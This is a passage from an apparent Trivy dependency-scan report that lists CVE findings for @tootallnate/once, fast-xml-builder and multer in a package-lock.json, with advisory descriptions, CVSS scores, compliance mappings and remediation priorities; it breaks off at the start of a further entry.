sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109 Title: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal' Description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability. Severity: LOW CweIDs: *id008 VendorSeverity: ghsa: 1 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L V40Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P V3Score: 3.3 V40Score: 1.9 redhat: V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 4 References: - https://access.redhat.com/security/cve/CVE-2026-3449 - https://github.com/TooTallNate/once - https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a - https://github.com/TooTallNate/once/issues/8 - https://nvd.nist.gov/vuln/detail/CVE-2026-3449 - https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612 - https://www.cve.org/CVERecord?id=CVE-2026-3449 PublishedDate: '2026-03-03T05:17:25.017Z' LastModifiedDate: '2026-05-19T15:38:48.397Z' context: sbom: name: '@tootallnate/once' version: 2.0.0 path: /package-lock.json compliance: cisControlsV8_1: &id010 - control: '7.1' title: Establish and Maintain a Vulnerability Management Process implementationGroup: IG1 - control: '7.2' title: Establish and Maintain a Remediation Process implementationGroup: IG1 - control: '7.3' title: Perform Automated Operating System Patch Management implementationGroup: IG1 - control: '7.4' title: Perform Automated Application Patch Management implementationGroup: IG2 - control: '16.11' title: Leverage Vetted Modules or Services for Application Security Components implementationGroup: IG2 nistCsf2_0: - &id011 function: IDENTIFY category: ID.RA subcategory: ID.RA-1 description: Asset vulnerabilities are identified and documented - &id012 function: GOVERN category: GV.SC subcategory: GV.SC-3 description: Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders pciDss4_0: - &id013 requirement: 6.3.3 description: Security vulnerabilities are identified and managed priority: CRITICAL - &id014 requirement: 11.3.1 description: Internal vulnerability scans are performed priority: HIGH mitreAttack: - &id015 tactic: Initial Access technique: T1195 techniqueName: Supply Chain Compromise subtechnique: T1195.001 subtechniqueName: Compromise Software Dependencies and Development Tools priority: priority: 6.671466666666666 epss: 0.00018 epss_percentile: 0.04653 is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.00072 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3bc7bf0933f4ab4f ruleId: CVE-2026-44665 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation' title: CVE-2026-44665 description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7. remediation: https://avd.aquasec.com/nvd/cve-2026-44665 references: [] tags: - vulnerability - pkg:fast-xml-builder@1.1.5 risk: cwe: &id009 - CWE-91 raw: VulnerabilityID: CVE-2026-44665 VendorIDs: - GHSA-5wm8-gmm8-39j9 PkgID: fast-xml-builder@1.1.5 PkgName: fast-xml-builder PkgIdentifier: PURL: pkg:npm/fast-xml-builder@1.1.5 UID: e589910a79395ad7 InstalledVersion: 1.1.5 FixedVersion: 1.1.7 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44665 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763 Title: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation' Description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7. Severity: HIGH CweIDs: *id009 VendorSeverity: ghsa: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N V3Score: 6.1 V40Score: 8.7 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 References: - https://access.redhat.com/security/cve/CVE-2026-44665 - https://github.com/NaturalIntelligence/fast-xml-builder - https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9 - https://nvd.nist.gov/vuln/detail/CVE-2026-44665 - https://www.cve.org/CVERecord?id=CVE-2026-44665 PublishedDate: '2026-05-13T16:16:59.093Z' LastModifiedDate: '2026-05-18T16:16:31.7Z' context: sbom: name: fast-xml-builder version: 1.1.5 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.362266666666663 epss: 0.00031 epss_percentile: 0.09168 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00124 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 291094d0af7c4e5d ruleId: CVE-2026-44664 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments' title: CVE-2026-44664 description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6. remediation: https://avd.aquasec.com/nvd/cve-2026-44664 references: [] tags: - vulnerability - pkg:fast-xml-builder@1.1.5 risk: cwe: &id016 - CWE-91 raw: VulnerabilityID: CVE-2026-44664 VendorIDs: - GHSA-45c6-75p6-83cc PkgID: fast-xml-builder@1.1.5 PkgName: fast-xml-builder PkgIdentifier: PURL: pkg:npm/fast-xml-builder@1.1.5 UID: e589910a79395ad7 InstalledVersion: 1.1.5 FixedVersion: 1.1.6 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44664 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80 Title: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments' Description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6. Severity: MEDIUM CweIDs: *id016 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 References: - https://access.redhat.com/security/cve/CVE-2026-44664 - https://github.com/NaturalIntelligence/fast-xml-builder - https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc - https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 - https://nvd.nist.gov/vuln/detail/CVE-2026-44664 - https://www.cve.org/CVERecord?id=CVE-2026-44664 PublishedDate: '2026-05-13T16:16:58.937Z' LastModifiedDate: '2026-05-13T16:58:09.717Z' context: sbom: name: fast-xml-builder version: 1.1.5 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.349866666666665 epss: 0.00031 epss_percentile: 0.09168 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00124 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 56ac1677596b7698 ruleId: CVE-2025-47935 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Multer vulnerable to Denial of Service via memory leaks from unclosed streams title: CVE-2025-47935 description: Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2025-47935 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id017 - CWE-401 raw: VulnerabilityID: CVE-2025-47935 VendorIDs: - GHSA-44fp-w29j-9vj5 PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.0.0 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47935 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b Title: Multer vulnerable to Denial of Service via memory leaks from unclosed streams Description: Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id017 VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 - https://github.com/expressjs/multer/pull/1120 - https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5 - https://nvd.nist.gov/vuln/detail/CVE-2025-47935 PublishedDate: '2025-05-19T20:15:25.863Z' LastModifiedDate: '2026-04-15T00:35:42.02Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.498533333333334 epss: 0.00177 epss_percentile: 0.38785 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00708 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9a2891a28bad4ab6 ruleId: CVE-2025-47944 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Multer vulnerable to Denial of Service from maliciously crafted requests title: CVE-2025-47944 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2025-47944 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id018 - CWE-248 raw: VulnerabilityID: CVE-2025-47944 VendorIDs: - GHSA-4pg4-qvpc-4q3h PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.0.0 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47944 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598 Title: Multer vulnerable to Denial of Service from maliciously crafted requests Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id018 VendorSeverity: ghsa: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 - https://github.com/expressjs/multer/issues/1176 - https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h - https://nvd.nist.gov/vuln/detail/CVE-2025-47944 PublishedDate: '2025-05-19T20:15:26.007Z' LastModifiedDate: '2026-04-15T00:35:42.02Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.371600000000004 epss: 0.00041 epss_percentile: 0.12343 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00164 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d58f5341093c2113 ruleId: CVE-2025-48997 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'multer: Multer vulnerable to Denial of Service via unhandled exception' title: CVE-2025-48997 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2025-48997 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id019 - CWE-248 raw: VulnerabilityID: CVE-2025-48997 VendorIDs: - GHSA-g5hg-p3ph-g8qg PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.0.1 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48997 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac Title: 'multer: Multer vulnerable to Denial of Service via unhandled exception' Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id019 VendorSeverity: ghsa: 3 redhat: 2 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N V40Score: 8.7 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 References: - https://access.redhat.com/security/cve/CVE-2025-48997 - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9 - https://github.com/expressjs/multer/issues/1233 - https://github.com/expressjs/multer/pull/1256 - https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg - https://nvd.nist.gov/vuln/detail/CVE-2025-48997 - https://www.cve.org/CVERecord?id=CVE-2025-48997 PublishedDate: '2025-06-03T19:15:39.577Z' LastModifiedDate: '2026-04-15T00:35:42.02Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.565733333333334 epss: 0.00249 epss_percentile: 0.48135 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00996 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 87e4175cbe5a176c ruleId: CVE-2025-7338 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'multer: Multer Denial of Service' title: CVE-2025-7338 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2025-7338 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id020 - CWE-248 raw: VulnerabilityID: CVE-2025-7338 VendorIDs: - GHSA-fjgf-rc76-4x9p PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.0.2 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-7338 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782 Title: 'multer: Multer Denial of Service' Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id020 VendorSeverity: ghsa: 3 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 References: - https://access.redhat.com/security/cve/CVE-2025-7338 - https://cna.openjsf.org/security-advisories.html - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b - https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p - https://nvd.nist.gov/vuln/detail/CVE-2025-7338 - https://www.cve.org/CVERecord?id=CVE-2025-7338 PublishedDate: '2025-07-17T16:15:35.227Z' LastModifiedDate: '2026-04-15T00:35:42.02Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.371600000000004 epss: 0.00041 epss_percentile: 0.12343 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00164 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2affafc067aeae6e ruleId: CVE-2026-2359 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'multer: Multer: Denial of Service via dropped file upload connections' title: CVE-2026-2359 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2026-2359 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id021 - CWE-772 raw: VulnerabilityID: CVE-2026-2359 VendorIDs: - GHSA-v52c-386h-88mc PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.1.0 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-2359 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd Title: 'multer: Multer: Denial of Service via dropped file upload connections' Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id021 VendorSeverity: ghsa: 3 nvd: 3 redhat: 3 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N V40Score: 8.7 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://access.redhat.com/security/cve/CVE-2026-2359 - https://cna.openjsf.org/security-advisories.html - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab - https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc - https://nvd.nist.gov/vuln/detail/CVE-2026-2359 - https://www.cve.org/CVERecord?id=CVE-2026-2359 PublishedDate: '2026-02-27T16:16:25.467Z' LastModifiedDate: '2026-03-19T17:28:16.05Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.351066666666668 epss: 0.00019 epss_percentile: 0.05291 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00076 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 80d0e617807f9c3a ruleId: CVE-2026-3304 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'multer: Multer: Denial of Service via malformed requests' title: CVE-2026-3304 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2026-3304 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id022 - CWE-459 raw: VulnerabilityID: CVE-2026-3304 VendorIDs: - GHSA-xf7r-hgr6-v32p PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.1.0 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3304 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712 Title: 'multer: Multer: Denial of Service via malformed requests' Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id022 VendorSeverity: ghsa: 3 nvd: 3 redhat: 3 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N V40Score: 8.7 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://access.redhat.com/security/cve/CVE-2026-3304 - https://cna.openjsf.org/security-advisories.html - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee - https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p - https://nvd.nist.gov/vuln/detail/CVE-2026-3304 - https://www.cve.org/CVERecord?id=CVE-2026-3304 PublishedDate: '2026-02-27T16:16:26.38Z' LastModifiedDate: '2026-03-19T17:28:33.81Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.351066666666668 epss: 0.00019 epss_percentile: 0.05291 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00076 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 19ed6f114225796d ruleId: CVE-2026-3520 severity: HIGH tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'multer: Multer: Denial of Service via malformed requests' title: CVE-2026-3520 description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available. remediation: https://avd.aquasec.com/nvd/cve-2026-3520 references: [] tags: - vulnerability - pkg:multer@1.4.5-lts.2 risk: cwe: &id023 - CWE-674 raw: VulnerabilityID: CVE-2026-3520 VendorIDs: - GHSA-5528-5vmv-3xc2 PkgID: multer@1.4.5-lts.2 PkgName: multer PkgIdentifier: PURL: pkg:npm/multer@1.4.5-lts.2 UID: 99f2d2a7a48c940f InstalledVersion: 1.4.5-lts.2 FixedVersion: 2.1.1 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3520 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530 Title: 'multer: Multer: Denial of Service via malformed requests' Description: Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available. Severity: HIGH CweIDs: *id023 VendorSeverity: ghsa: 3 nvd: 3 redhat: 3 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N V40Score: 8.7 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://access.redhat.com/security/cve/CVE-2026-3520 - https://cna.openjsf.org/security-advisories.html - https://github.com/expressjs/multer - https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752 - https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2 - https://nvd.nist.gov/vuln/detail/CVE-2026-3520 - https://www.cve.org/CVERecord?id=CVE-2026-3520 PublishedDate: '2026-03-04T17:16:22.61Z' LastModifiedDate: '2026-03-09T18:03:23.1Z' context: sbom: name: multer version: 1.4.5-lts.2 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 23.39586666666667 epss: 0.00067 epss_percentile: 0.20499 is_kev: false kev_due_date: null components: severity_score: 7 epss_multiplier: 1.00268 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8b483b8e54efe250 ruleId: CVE-2025-29927 severity: CRITICAL tool: name: trivy version: unknown location: path: package-lock.json 